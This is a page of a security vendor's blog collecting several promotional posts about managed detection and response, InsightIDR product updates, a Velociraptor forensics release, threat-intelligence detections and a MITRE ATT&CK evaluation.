Detection and Response – Page 9 – CyberSecurity Confabulation

MDR, MEDR, SOCaaS: Which Is Right for You?

Posted 3 years ago by Aaron Wells

Getting the most from managed services

MDR, MEDR, SOCaaS: Which Is Right for You?

Even if a security team was given a blank check to spend whatever they wanted and hire however they wanted, it would still be a massive effort to build a detection and response (D&R) program tailored to that organization’s specific needs. Thankfully, the plethora of managed services options available can help with that problem.

But with multiple types of managed services providers out there, how do you know which type of services are right for your organization? How can you effectively interview providers, attempt to then construct a D&R suite with the right vendor, and simultaneously continue to fortify your security program against threats?

For an organization beginning the search for a managed services partner that can actually add value, there is some starter legwork that can be done. There are many approaches to managed services providers along the D&R vein, such as:

Managed Detection and Response (MDR)
Managed Endpoint Detection and Response (MEDR)
Managed Security Service Provider (MSSP)

That last one, MSSP, is a blanket term for a provider that can assist with many specialized services like outsourced Security Operations Center-as-a-service (SOCaaS), MDR, or management of security tools such as a security information and event management (SIEM), firewalls, vulnerability risk management, and more. Knowing all this, while looking for the right managed service it’s simply a fact that you’re going to talk to a lot of vendors. Each one of them can say they’ll help you boost security defenses – they’ll say they have great people, they use the best technology, and they have a process to ensure your success.

The challenge? Every vendor's marketing material will begin to sound the same. What it really comes down to is determining which provider’s strategy is best suited for your program's needs. Let’s take a closer look at these three types of managed services to help you decide the best fit for your organization.

MDR

An MDR provider works with a customer to gain visibility and complete coverage across the customer’s entire environment. This helps a security practitioner better see when and where malicious-looking activity may be taking place.

MDR providers help solve operational challenges by instantly becoming an extension of their customers’ teams – providing headcount and extending coverage to 24x7x365. An MDR partner can also provide expertise and technologies to help find attacker behavior quickly and stop it before it becomes a wider issue.

More and more companies are becoming the focus of targeted attacks – specific aggressions designed to infiltrate an individual organization’s defenses. An MDR provider becomes a partner in helping to identify a targeted threat (read: reputational threat), repair affected systems, and focus efforts into both taking down the threat and providing recommendations for making the affected system more secure in the future.

There are a lot of MDR providers that go beyond “throwing alerts over the fence” to let clients parse and triage themselves. These days more MDR providers are finding it worth their while – and their bottom lines – to become a more strategic partner to security organizations. They help further security initiatives, build cyber resilience, and work with clients to get deeper visibility in their threat landscapes by:

Providing post-incident investigational insights
Weeding out benign events and only reporting true positive threats
Providing tailored remediation and mitigation recommendations

The role of XDR

More recently, managed services providers (including Rapid7) have integrated extended detection and response (XDR) into their overarching MDR solutions. This creates a more powerful and proactive D&R process by:

Recognizing there is no perimeter for data as it’s rushing back and forth from endpoints to clouds and beyond
Relieving security teams of steep analytical analysis so more of the focus is on threat hunting, as parsing alerts is automatically incorporated into threat intelligence
Curating high-fidelity detections and actionable telemetry to create efficient responses

These are all great benefits in extending what is possible with D&R and being proactive about extinguishing threats. However, MDR providers incorporating XDR into their approaches can’t simply add the letter “X” into the list of services and call it a day. XDR must help the organization actually gain control and visibility across its entire attack surface, from the nearest endpoint(s) to compromised user accounts, network traffic, cloud sources, and more.

When folded into a cohesive strategy that places emphasis on more proactive efforts, products like InsightIDR can be that solution that takes in telemetry from these disparate sources, correlates the data, and provides greater context to a potential threat.

MEDR

MEDR is a flavor of MDR that’s aligned more as an add-on management service that sits on top of endpoint-protection technology deployment. While MEDR does provide benefits like gaining visibility across wherever agents are set up, the EDR-centric approach won’t show the full story of a threat and its scope; an agent will simply tell the service provider what it gathers from the endpoint.

Many breaches, however, do begin at the endpoint. Why? Attackers can easily bypass firewalls and all sorts of implemented security controls by compromising just one endpoint, such as a user’s laptop. From there, they can move throughout a network, scooping up valuable internal/external data and quickly ruining a company’s reputation in the process. Even if they’re quickly found, what have they gotten away with?

Thus, focusing on endpoints is important. That’s simply an indisputable fact. EDR-based services are powerful tools within a managed services program. They provide advantages like:

Prevention aspects with integrated endpoint prevention platform (EPP) agent capabilities, such as Antivirus (NGAV) and stopping malicious file execution
Detecting compromised endpoints earlier in the attack chain
File integrity monitoring (FIM) capabilities so your team is alerted on changes to specific files on a given endpoint (if you’re monitoring for yourself)

Focusing only on endpoints, however, does miss key network- and cloud-spanning analysis that can deliver important telemetry in the fight against potential threats. MEDR typically lacks the ability to analyze network-spanning data, user analytics, and compliance behaviors, glean actionable insights, and use them to effectively respond to an incident. So the downside comes with the engagement model. Some MEDR players will rely on the tech to do most of the heavy lifting. Prevention is there to stop the threat early.

But if the attacker gets past this point, the managed services provider might take automated actions to handle alerts using the EDR tool or, worse, pass that alert on to their client for them to manage the investigation and response efforts. (And if you think that automated EDR actions are great, you’re encouraged to read about the risks associated with taking automated response actions without human intervention.)

SOCaaS

SOCaaS. That’s a heavy acronym. But the concept of “security operations center-as-a-service” is trying to fill a heavy need of any modern company: the implementation and management of a strong and sound cybersecurity program. Any MSSP who offers a holistic SOCaaS option should be able to provide the bottom-line benefit of enabling security practitioners to focus time and energy on innovations in other parts of the business.

A team of experts who can proactively defend, respond to threats, and provide (hopefully) round-the-clock support on behalf of a customer is probably the closest definition to SOCaaS that’s been bandied about in recent years. They can be a virtual SOC for a company, serving as a tactical console to enable team members to perform day-to-day tasks. They’ll also help teams strategize amidst bigger, longer-term security trends. So, in what ways can SOCaaS providers act as that strategic detection-and-response center for security teams?

Advanced SIEM functionality – In the midst of potentially billions of security events each day, a SIEM can help to prioritize the ones that truly deserve follow-up. A good SOCaaS provider will contextualize a proper response plan by taking into account user- and attacker-behavior analytics, performance metrics, incident response, and endpoint detection.
The human element – In the incredibly competitive marketplace for today’s security talent, it can be a daunting task for company leadership to source, develop, and retain an entire SOC of capable personnel. This is particularly true in efforts to maintain diversity in cybersecurity hiring. For example, Forrester says that women currently make up just 24% of security professionals worldwide.
Established processes – It typically takes nothing less than an extremely sophisticated process framework – established over a long period of time and testing – to be able to accurately identify, prioritize, and remediate a potential threat. It can be an incredible benefit to a business to forgo having to build out their own SOC with key personnel that – even when assembled – must take the necessary trial-and-error time to be able to work together efficiently and respond to threats effectively.
D&R expertise – If the goal of engaging SOCaaS is not to augment an existing D&R program, then vetting the provider for their expertise in that area is incredibly important. It really comes down to what you’re looking to achieve; as mentioned above, a modern MDR provider will leverage multiple sources of telemetry to detect and respond to threats. But when fully outsourcing a SOC, it’s incumbent upon security personnel representing the customer to figure out how D&R expertise figures into the larger picture of outsourced SOC operations at the vendor organization.
Communications – Beyond anything at all to do with technology and security, a SOCaaS provider must have great communication skills. How will the provider present information – especially about a potentially dire threat that could affect the company, its reputation, and its bottom line – to their client’s customer and executive team? Is there a dedicated point-of-contact (POC) or a team with whom you’ll be regularly working and interfacing?

If this is looking like a menu from which security teams looking for managed services can choose, that’s because it is. However, in this context we’re discussing SOCaaS as a fully outsourced arm of a business. For whatever reason – the need for speed/growth in other parts of the business, lack of recruitment power for talented security practitioners, etc. – a business may simply wish to staff a security “skeleton crew” who interfaces with the SOCaaS provider and relies on that provider to run, monitor, manage, and support all of the functionalities.

Bottom line: Choose the managed security services partner that best fits your needs

If your security organization is considering a managed services provider, that means your team is most likely looking to offload tedious and/or technical operational tasks that your existing security team simply doesn’t have the hours in a day to manage. Or you might need some augmentation and expertise to help with round-the-clock coverage. It also means you’re ready to find a partner to provide deep analysis and actionable insights so you can find out:

What is going on, and…
Is it something the company should worry about?

After that, your specialized provider should be able to make recommendations on how to respond – or, better yet, take those actions on your behalf. Because at the end of the day, it all depends on the outcome(s) you’re looking to achieve. Turnkey D&R services while your team focuses on other important things? Simple endpoint monitoring from a traditional MSSP? Or, are you looking to farm out your SOC operations and let someone else deal with all things security, not just some things security?

For those looking for that more comprehensive solution targeted at strictly strengthening the D&R muscle, leveraging an MDR provider with XDR capabilities is the way to go.

It’s going to take some budget, sure. But most of the time that same budget is earmarked for a similar cost as one of an open headcount (depending on the size of the environment). The capital expenditure (CapEx) cost is relative – and oftentimes far more affordable – when compared to the ongoing operating expenses (OpEx) outlay it takes to hire, train, and build an in-house SOC program. Whichever outcome your team is focused on, managed services as a whole is an affordable way to help build a D&R program at scale.

Looking for even more analysis to help you make an informed managed services decision? Check out the 2022 MDR Buyer’s Guide from Rapid7, or contact us for more info.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Velociraptor Version 0.6.4: Dead Disk Forensics and Better Path Handling Let You Dig Deeper

Posted 3 years ago by Carlos Canto

Rapid7 is pleased to announce the release of Velociraptor version 0.6.4 – an advanced, open-source digital forensics and incident response (DFIR) tool that enhances visibility into your organization’s endpoints. This release has been in development and testing for several months now and has a lot of new features and improvements.

The main focus of this release is in improving path handling in VQL to allow for more efficient path manipulation. This leads to the ability to analyze dead disk images, which depends on accurate path handling.

Path handling

A path is a simple concept – it’s a string similar to /bin/ls that can be used to pass to an OS API and have it operate on the file in the filesystem (e.g. read/write it).

However, it turns out that paths are much more complex than they first seem. For one thing, paths have an OS-dependent separator (usually / or \). Some filesystems support path separators inside a filename too! To read about the details, check out Paths and Filesystem Accessors, but one of the most interesting things with the new handling is that stacking filesystem accessors is now possible. For example, it’s possible to open a docx file inside a zip file inside an ntfs drive inside a partition.

Dead disk analysis

Velociraptor offers top-notch forensic analysis capability, but it’s been primarily used as a live response agent. Many users have asked if Velociraptor can be used on dead disk images. Although dead disk images are rarely used in practice, sometimes we do encounter these in the field (e.g. in cloud investigations).

Previously, Velociraptor couldn’t be used easily on dead disk images without having to carefully tailor and modify each artifact. In the 0.6.4 release, we now have the ability to emulate a live client from dead disk images. We can use this feature to run the exact same VQL artifacts that we normally do on live systems, but against a dead disk image. If you’d like to read more about this new feature, check out Dead Disk Forensics.

Resource control

When collecting artifacts from endpoints, we need to be mindful of the overall load that collection will cost on endpoints. For performance-sensitive servers, our collection can cause operational disruption. For example, running a yara scan over the entire disk would utilize a lot of IO operations and may use a lot of CPU resources. Velociraptor will then compete for these resources with the legitimate server functionality and may cause degraded performance.

Previously, Velociraptor had a setting called Ops Per Second, which could be used to run the collection “low and slow” by limiting the rate at which notional “ops” were utilized. In reality, this setting was only ever used for Yara scans because it was hard to calculate an appropriate setting: Notional ops didn’t correspond to anything measurable like CPU utilization.

In 0.6.4, we’ve implemented a feedback-based throttler that can control VQL queries to a target average CPU utilization. Since CPU utilization is easy to measure, it’s a more meaningful control. The throttler actively measures the Velociraptor process’s CPU utilization, and when the simple moving average (SMA) rises above the limit, the query is paused until the SMA drops below the limit.

The above screenshot shows the latest resource controls dialog. You can now set a target CPU utilization between 0 and 100%. The image below shows how that looks in the Windows task manager.

By reducing the allowed CPU utilization, Velociraptor will be slowed down, so collections will take longer. You may need to increase the collection timeout to correspond with the extra time it takes.

Note that the CPU limit refers to a percentage of the total CPU resources available on the endpoint. So for example, if the endpoint is a 2 core cloud instance a 50% utilization refers to 1 full core. But on a 32 core server, a 50% utilization is allowed to use 16 cores!

IOPS limits

On some cloud resources, IO operations per second (IOPS) are more important than CPU loading since cloud platforms tend to rate limit IOPS. So if Velociraptor uses many IOPS (e.g. in Yara scanning), it may affect the legitimate workload.

Velociraptor now offers limits on IOPS which may be useful for some scenarios. See for example here and here for a discussion of these limits.

The offline collector resource controls

Many people use the Velociraptor offline collector to collect artifacts from endpoints that they’re unable to install a proper client/server architecture on. In previous versions, there was no resource control or time limit imposed on the offline collector, because it was assumed that it would be used interactively by a user.

However, experience shows that many users use automated tools to push the offline collector to the endpoint (e.g. an EDR or another endpoint agent), and therefore it would be useful to provide resource controls and timeouts to control Velociraptor acquisitions. The below screenshot shows the new resource control page in the offline collector wizard.

GUI changes

Version 0.6.4 brings a lot of useful GUI improvements.

Notebook suggestions

Notebooks are an excellent tool for post processing and analyzing the collected results from various artifacts. Most of the time, similar post processing queries are used for the same artifacts, so it makes sense to allow notebook templates to be defined in the artifact definition. In this release, you can define an optional suggestion in the artifact yaml to allow a user to include certain cells when needed.

The following screenshot shows the default suggestion for all hunt notebooks: Hunt Progress. This cell queries all clients in a hunt and shows the ones with errors, running and completed.

Multiple OAuth2 authenticators

Velociraptor has always had SSO support to allow strong two-factor authentication for access to the GUI. Previously, however, Velociraptor only supported one OAuth2 provider at a time. Users had to choose between Google, Github, Azure, or OIDC (e.g. Okta) for the authentication provider.

This limitation is problematic for some organizations that need to share access to the Velociraptor console with third parties (e.g. consultants need to provide read-only access to customers).

In 0.6.4, Velociraptor can be configured to support multiple SSO providers at the same time. So an organization can provide access through Okta for their own team members at the same time as Azure or Google for their customers.

The Velociraptor knowledge base

Velociraptor is a very powerful tool. Its flexibility means that it can do things that you might have never realized it can! For a while now, we’ve been thinking about ways to make this knowledge more discoverable and easily available.

Many people ask questions on the Discord channel and learn new capabilities in Velociraptor. We want to try a similar format to help people discover what Velociraptor can do.

The Velociraptor Knowledge Base is a new area on the documentation site that allows anyone to submit small (1-2 paragraphs) tips about how to do a particular task. Knowledge base tips are phrased as questions to help people search for them. Provided tips and solutions are short, but they may refer users to more detailed information.

If you learned something about Velociraptor that you didn’t know before and would like to share your experience to make the next user’s journey a little bit easier, please feel free to contribute a small note to the knowledge base.

Importing previous artifacts

Updating the VQL path handling in 0.6.4 introduces a new column called OSPath (replacing the old FullPath column), which wasn’t present in previous versions. While we attempt to ensure that older artifacts should continue to work on 0.6.4 clients, it’s possible that the new VQL artifacts built into 0.6.4 won’t work correctly on older versions.

To make migration easier, 0.6.4 comes built in with the Server.Import.PreviousReleases artifact. This server artifact will load all the artifacts from a previous release into the server, allowing you to use those older versions with older clients.

Try it out!

If you’re interested in the new features, take Velociraptor for a spin by downloading it from our release page. It’s available for free on GitHub under an open source license.

As always, please file bugs on the GitHub issue tracker or submit questions to our mailing list by emailing velociraptor-discuss@googlegroups.com. You can also chat with us directly on our discord server.

Learn more about Velociraptor by visiting any of our web and social media channels below:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

3 Ways InsightIDR Users Are Achieving XDR Outcomes

Posted 3 years ago by Jesse Mack

The buzz around extended detection and response (XDR) is often framed in the future tense — here's what it will be like when we can start bringing more sources of telemetry into our detections, or what will happen when we can use XDR to really start reducing false positives. But users of InsightIDR, Rapid7's cloud SIEM and XDR solution, are already making those outcomes a reality.

Turns out, InsightIDR has been doing XDR for a long time, bringing those promised results to life before the industry started to associate them with XDR. Here are 3 ways our customers are benefiting from those outcomes.

1. Gain greater visibility

You can't manage what you don't measure — and you certainly can't measure what you don't see or know is happening. The same applies to threat detection. If you never detect malicious activity, you never have a chance to respond or remediate — until you're already reeling from the impacts of a breach and trying to limit the damage.

Greater visibility is part of the promise of XDR. By bringing in a wider range of telemetry sources than security operations center (SOC) teams have previously had access to, XDR aims to paint a fuller picture of attacker behavior, so security teams can better analyze and respond to it.

And as it turns out, this enhanced visibility is one of the key benefits InsightIDR has been helping users achieve.

“Rapid7 InsightIDR gives us visibility into the activities on our servers and network. Before, we were blind," says Karien Greeff, Director, Security at ODEK Technologies.

For many users, this boost in visibility is translating directly into more effective action.

“Rapid7 InsightIDR vastly improved the visibility of our network, endpoints, and weak spots. We now have the ability to respond to threats we didn't see before we had InsightIDR," says Robert Middleton, Network Administrator at CU4SD.

2. Focus on what matters

Of course, visibility is only as good as what you do with it. Alert fatigue is a problem SOC analysts know all too well — so if you can suddenly detect a wealth of additional activity on your network, you need some way to prioritize that information.

InsightIDR user Kerry LeBlanc, who is responsible for cybersecurity at medical technology innovator Bioventus, notes that next-level visibility — “Everything comes into InsightIDR. I mean, everything," he quips in a case study — is just the start of the improvements the tool has made for Kerry and his team.

“The other major change, and this is part of extended detection and response (XDR), is being able to correlate, analyze, prioritize, and remediate as quickly as possible. Rapid7 does that because it has visibility into everything," he says. “It can build context around the threats and the events. It can help prioritize them for a higher level of awareness. I can focus on them a lot quicker, and it gives me the opportunity to reduce severity and eliminate further impact."

Kerry isn't the only one who's using InsightIDR to help filter out the noise and focus on the alerts that truly matter.

“Rapid7 InsightIDR has given us the ability to hone in on specific incidents without the need to remove the unnecessary chatter," says one VP of security at a large enterprise financial services company. "We now have the ability to view our environment with a single pane of glass providing relative information quickly."

3. Do more with one tool

The relationship between XDR and SIEM has been much talked about in security circles, and it's still a dynamic question. While some see these markets colliding at some point in the distant future, others identify SIEM and XDR as solving separate but complementary use cases. Nevertheless, the ability to consolidate tools and do more with a single solution is one of the hopes for XDR — and some InsightIDR users are already beginning to make that a reality.

“InsightIDR has been a great tool that is easy to deploy and cover several needed security functions such as SIEM, deception, EDR, UBA, alerting, threat feeds, and reporting," a Senior Director of Security says via Gartner Peer Insights.

That streamlining of the security tech stack can be especially impactful for organizations that haven't updated their threat detection solutions in some time.

“With Rapid7 InsightIDR, we were able to eliminate multiple old products and workflows," says one Chief Security Officer at a medium enterprise media and entertainment company.

Start seeing XDR outcomes now

If you're considering whether to embrace XDR at your organization, it might seem like the payoff will be further down the line, when the product category truly reaches maturity — but as the attack landscape grows increasingly complex, security analysts simply don't have the luxury to wait. Luckily, those benefits might be closer than you think. With InsightIDR, customers are already enjoying many of the outcomes that SOC teams are seeking from XDR adoption: more visibility, improved signal-to-noise, and a more consolidated security stack.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

MDR Plus Threat Intel: 414 New Detections in 251 Days (You’re Welcome)

Posted 3 years ago by Sam Adams

Last summer, Rapid7 acquired IntSights and its advanced external threat intelligence solution (now Threat Command by Rapid7). Threat Command monitors hundreds of thousands of sources across the clear, deep, and dark web, identifying malicious actors and notifying customers of potential attacks against their organizations.

The reason for the acquisition? With these external intelligence sources built into InsightIDR, its breadth of high-fidelity, low-noise detections would be unmatched.

Detections have been a Rapid7 thing since the start.

In an industry focused on ingesting data – and placing the burden on security teams to write their own detections – we went another way. We went detections first, delivering the most robust set of actionable detections out of the box.

Today, our detections library includes threat intelligence from our open-source communities, advanced attack surface mapping, proprietary machine learning, research projects, real-world follow-the-sun security operations center (SOC) experience, and 2.1+ trillion weekly security events observed across our detection and response (D&R) platform.

Now, Threat Command’s threat intelligence platform (TIP) content is integrated with our leading detection and response products and services. You get earlier threat identification and faster remediation.

MDR and InsightIDR customers have an even larger, expertly curated library

Right now, Rapid7 customers can find a lot more needles in haystacks. And we’ve made sure you can spot them quickly, easily, and reliably.

Our Threat Intelligence and Detection Engineering Team (TIDE) has done its work developing signatures and analytic detections for existing and emerging threats. TIDE analysts continuously provide InsightIDR users and managed detection and response (MDR) SOC analysts with the surrounding context needed to defend against threats with new detection mechanisms for vulnerability exploits and attack campaigns.

The detections are for newcomers as well as familiar names like the notorious Russian hacking group EvilCorp. As always, detections ensure coverage for various indicators of compromise (IOCs) that they and other attackers use in the wild.

Think of us as your research and execution team: As additional IOCs are added to the Rapid7 Threat Command Threat Library, they are automatically tested and applied to your logs to create alerts when identified.

What’s better and better, by the numbers

Now, InsightIDR has your back with:

138 threats powered by Threat Command's Threat Library
414 detection rules powered by dynamic IOC feeds
Monitoring for all IOCs associated with each threat actor is automatic as they are added to the Threat Library

The mission is always to deliver more actionable alerts (with recommendations) and to reduce noise. So our TIDE Team tests IOCs and disables those we find to be unsuitable for alerting.

And this is just the beginning: All detections improve in fidelity over time as our MDR analysts inform the threat intelligence team of rule suppressions to provide a tailored approach for customers, add granularity, reduce noise, and avoid recurrency. And as Threat Command adds IOCs, they’ll turn into meticulous, out-of-the-box detections – whether you use InsightIDR, rely on our MDR SOC analysts, or collaborate with us to keep your environment secure.

If you’re an MDR customer or just considering it, here are other numbers to know:

With a 95% 4-year analyst retention rate, Rapid7 is an employer of choice during the cybersecurity staffing crisis and The Great Resignation
Our team of 24/7/365 global SOC analysts are proven threat hunters and DFIR experts
Together, the staff has a combined 500+ security certifications

Now, with even more detections, the strongest back-end system capturing threats as they evolve, and unmatched knowledge in the field, you can level up your D&R program with Rapid7 InsightIDR — or a partnership with the best-in-breed MDR analyst teams out there.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

What’s New in InsightIDR: Q1 2022 in Review

Posted 3 years ago by Margaret Wei

Introducing new InsightIDR capabilities to accelerate your detection and response program

What's New in InsightIDR: Q1 2022 in Review

When we talk to customers and security professionals about what they need more of in their security operations center (SOC), there is one consistent theme: time. InsightIDR — Rapid7's leading cloud SIEM and XDR — helps teams cut through the noise and accelerate their detection and response, without sacrificing comprehensive coverage across modern environments and advanced attacks. This Q1 2022 recap post digs into some of the latest investments we've made to drive tangible time savings for customers, while still leveling up your detection and response program with InsightIDR.

New InsightIDR Detections powered by Threat Command by Rapid7's TIP Threat Library

Following Rapid7's 2021 acquisition of IntSights and their leading external threat intelligence solution, Threat Command, we are excited to provide InsightIDR customers with new built-in threat intelligence via Threat Command's threat intelligence platform (TIP).

We have integrated Threat Command's TIP ThreatLibrary into InsightIDR, bringing its threat intelligence content into our detection library to ensure Rapid7 InsightIDR and Managed Detection and Response (MDR) customers have the most up-to-date and comprehensive detection coverage, more visibility into new IOCs, and continued strength around signal-to-noise.

Using the combined threat intelligence research teams across Rapid7 Threat Command and our services organization, this content will be maintained and updated across the platform – ensuring our customers get real-time protection from evolving threats.

InsightIDR delivers superior signal-to-noise in latest MITRE Engenuity ATT&CK evaluation

We're excited to share that InsightIDR has successfully completed the 2022 MITRE Engenuity ATT&CK Evaluation, which focused on how adversaries abuse data encryption for exploitation and/or ransomware. This evaluation tested InsightIDR's EDR capabilities (powered by our native endpoint agent, the Insight Agent) and our ability to detect these advanced attacks. A few key takeaways and result highlights:

InsightIDR demonstrated solid visibility across the cyber kill chain – with visibility across 18 of the 19 phases covered across both simulations.
Consistently identified threats early, with alerts firing in the first phase – Initial Compromise – for both the Wizard Spider and Sandworm attacks.
Showcased our commitment to signal-to-noise – with targeted and focused detections across each phase of the attack (versus firing loads of alerts for every minute substep).

As our customers know, EDR is just one component of the detection coverage unlocked with InsightIDR. While beyond the scope of this evaluation, beyond endpoint coverage, InsightIDR delivers defense in depth across users and log activity, network, and cloud. Learn more about InsightIDR's MITRE evaluation results in our recent blog post.

Investigate in seconds with Quick Actions powered by InsightConnect

InsightIDR and InsightConnect teamed up to create Quick Actions, a new feature that provides instant automation within InsightIDR to reduce time to respond to investigations, all with the click of a button.

Quick Actions are pre-configured automation actions that customers can run within their InsightIDR instance to get the answers they need fast and make the investigative process more efficient, and there's no configuration required. Some Quick Actions use cases include:

Threat hunting within log search. Use the "Look Up File Hash with Threat Crowd" quick action to learn more about a hash within an endpoint log. If the output of the quick action finds the file hash is malicious, you can choose to investigate further.
More context around alerts in Investigations. Use the "Look Up Domain with WHOIS" quick action to receive more context around an IP associated with an alert in an investigation.

More customizability with AWS GuardDuty detection rules

We now have over 100 new AWS GuardDuty Attacker Behavior Analytics (ABA) detection rules to provide significantly more customization and tuning ability for customers compared to our previous singular third-party AWS GuardDuty UBA detection rule. With these new ABA alerts, it's possible to set rule actions, tune rule priorities, or add an exception on each individual GuardDuty detection rule.

New pre-built CIS control dashboards and overall dashboard improvements

We're continually expanding our pre-built dashboard library to allow users to easily visualize their data within the context of common frameworks.

The CIS Critical Security Controls are a recommended set of actions for cyber defense that provide specific and actionable ways to thwart the most pervasive attacks. We know CIS is one of the most common security frameworks our customers consider, so we've recently added 3 new CIS control dashboards that cover CIS Control 5: Account Management, CIS Control 9: Email and Web Browser Protections, and CIS Control 10: Malware Defenses.

We also continue to make changes and additions to our overall Dashboard capabilities. Within the card builder, we've added the ability to:

Change chart colors
Add a chart caption
Swap between linear and logarithmic scale for charts
Add data labels on top of dashboard charts

Continuous improvements to Investigation Management

Another area we are continuously making improvements in is Investigation Management. A huge part of this ongoing development is customer feedback, and over the last quarter, we've made some additions to the experience based on just that. We've added:

New filters for alert type, MITRE ATT&CK tactic, and investigation type to provide more options when it comes to tailoring the list view of investigations
The new "notes count" feature, which allows customers to save time and track the status of an ongoing collaboration within an investigation
Improvements to the bulk-close feature within Investigation Management, and new progress banners so you can easily track the status of each bulk-close request

Other updates

New CATO Networks event source can now be configured to send InsightIDR WAN firewall and internet firewall data.
Log Search Syntax Highlighting applies different colors and formatting to the distinct components of a LEQL query (such as the search logic and values) to improve overall readability and provide an easy way to identify potential errors within queries.
New curated IDS Rules powered by the Insight Network Sensor help you detect activity associated with thousands of common pieces of malware.
Insight Network Sensor management page updates make it easier to deploy and maintain your fleet of Network Sensors. We've rebuilt the sensor management page to better surface critical configuration statuses, diagnostic information, and links to support documentation.

Stay tuned!

As always, we're continuing to work on exciting product enhancements and releases throughout the year. Keep an eye on our blog and release notes as we continue to highlight the latest in detection and response at Rapid7.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Sharpen Your IR Capabilities With Rapid7’s Detection and Response Workshop

Posted 3 years ago by Mikayla Wyman

You’re tasked with protecting your environment, and you’ve invested significant time and resources into deploying and configuring your tools — but how do you know if the security controls you’ve put into place are effective? The challenge continues to grow as attacker tactics, techniques, and procedures (TTPs) constantly evolve. In today's landscape, a security breach is nearly inevitable.

Amid an ever-changing threat landscape, do you have confidence your tools are able to immediately detect threats when they occur? And more importantly, does your team know how to effectively respond to stop the attack, and do it fast?

While we don’t have a crystal ball to offer, we can help make sure your detection and response plan holds up against a breach.

Say hello to Rapid7’s newest incident response service: the Detection and Response Workshop.

Put your safeguards to the test with a guided attack simulation

The Detection and Response Workshop is a guided exercise led by Rapid7’s digital forensics and incident response (DFIR) experts to confirm that your team can quickly detect threats and evaluate your response procedures against a simulated attack within your environment.

This workshop isn’t a Tabletop Exercise (TTX), an IR Planning engagement, or a Purple Team exercise. We'll pit your organization's defenders against the latest attack campaigns, within the tools they use on a daily basis, to test your ability to respond when an incident happens under live conditions, without your company’s reputation at stake.

Each Workshop simulation is tailored to your specific needs and mapped to the MITRE ATT&CK Framework. Throughout the Workshop, our experts make recommendations to help strengthen your program – from existing configurations of tools, products, and devices to analysis processes and documentation.

The workshop itself is hands-on and doesn’t require current use of a Rapid7 product. Any security team can utilize this new service to understand what TTPs an adversary may use against them and make sure their program detects and responds accordingly.

Your team will leave the multi-day workshop feeling confident that you have an understanding of where and how to strengthen your existing IR process and detection and response program. You’ll receive a detailed report of the workshop, including our written assessment and recommendations to build resilience into your response program.

Rapid7 Incident Response consulting services

Security is the core of our business, and IR plays a huge role in the security landscape. Our team of DFIR experts — the same experts that respond to incidents for all 1,200+ of our MDR customers — have decades of experience under their belt that they utilize to analyze your security fit-up from all angles. Our team is complete with experts in threat analysis, forensics, and malware analysis, as well as a deep understanding of industry-leading technologies.

Knowing where your program stands is a crucial part of enhancing it, and our IR team has built specialized services to help your team build resiliency at each stage in the process. We now offer a full Incident Response Service Curriculum, allowing teams to engage in a single course for their IR goals or register for the entire curriculum.

From planning to full attack simulations, your team can level up its skills with tailored guidance and coaching through each course:

Course 101: Incident Response Program Development
Course 201: Tabletop Exercise (TTX)
Course 301: Detection & Response Workshop
Course 401: Purple Team Exercise

No matter what stage your team is in building your incident response program, our experts are able to help analyze and provide recommendations for improvement.

The Detection & Response Workshop is available now for all security teams. To learn more, talk to a Rapid7 sales representative by filling out this form today.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

MITRE Engenuity ATT&CK Evaluation: InsightIDR Drives Strong Signal-to-Noise

Posted 3 years ago by Sam Adams

Rapid7 is very excited to share the results of our participation in MITRE Engenuity’s latest ATT&CK Evaluation, which examines how adversaries abuse data encryption to exploit organizations.

With this evaluation, our customers and the broader security community get a deeper understanding of how InsightIDR helps protectors safeguard their organizations from destruction and ransomware techniques, like those used by the Wizard Spider and Sandworm APT groups modeled for this MITRE ATT&CK analysis.

What was tested

At the center of InsightIDR’s XDR approach is the included endpoint agent: the Insight Agent. Rapid7’s universal Insight Agent is a lightweight endpoint software that can be installed on any asset – in the cloud or on-premises – to collect data in any environment. The Insight Agent enables our EDR capabilities that are the focus of this ATT&CK Evaluation.

Across both Wizard Spider and Sandworm attacks, we saw strong results indicative of the high-fidelity endpoint detections you can trust to identify real threats as early as possible.

Building transparency and a foundation for dialogue with MITRE Engenuity ATT&CK evaluations

Since the launch of MITRE ATT&CK in May 2015, security professionals around the globe have leveraged this framework as the “go-to” catalog and reference for cyberattack tactics, techniques, and procedures (TTPs). With this guide in hand, security teams visualize detection coverage and gaps, map out security plans and adversary emulations to strengthen defenses, and quickly understand the criticality of threats based on where in the attack chain they appear. Perhaps most importantly, ATT&CK provides a common language with which to discuss breaches, share known adversary group behaviors, and foster conversation and shared intelligence across the security community.

MITRE Engenuity’s ATT&CK evaluation exercises offer a vehicle for users to “better understand and defend against known adversary behaviors through a transparent evaluation process and publicly available results — leading to a safer world for all.” The 2022 MITRE ATT&CK evaluation round focuses on how groups leverage “Data Encrypted for Impact” (encrypting data on targets to prevent companies from being able to access it) to disrupt and exploit their targets. These techniques have been used in many notorious attacks over the years, notably the 2015 and 2016 attacks on Ukrainian electric companies and the 2017 NotPetya attacks.

How to use MITRE Engenuity evaluations

One of the most compelling parts of the MITRE evaluations is the transparency and rich detail provided in the emulation, the steps of each attack, vendor configurations, and detailed read-outs of what transpired. But remember: These vendor evaluations do not necessarily reflect how a similar attack would play out in your own environment. There are nuances in product configurations, the sequencing of events, and the lack of other technologies or product capabilities that may exist within your organization but didn’t in this scenario.

It's best to use ATT&CK Evaluations to understand how a vendor's product, as configured, performed under specific conditions for the simulated attack. You can analyze how a vendor's offering behaves and what it detects at each step of the attack. This can be a great start to dig in for your own simulation or to discuss further with a current or prospective vendor. Consider your program goals and metrics that you are driving towards. Is more telemetry a priority? Is your team driving toward a mean-time-to-respond (MTTR) benchmark? These and other questions will help provide a more relevant view into these evaluation results in a way that is most relevant and meaningful to your team.

InsightIDR delivers superior signal-to-noise

Since the evolution of InsightIDR, we made customer input our "North Star" in guiding the direction of our product. While the technology and threat landscape continues to evolve, the direction and mission that our customers have set us on has remained constant: In a world of limitless noise and threats, we must make it possible to find and extinguish evil earlier, faster, and easier.

Simple to say, harder to do.

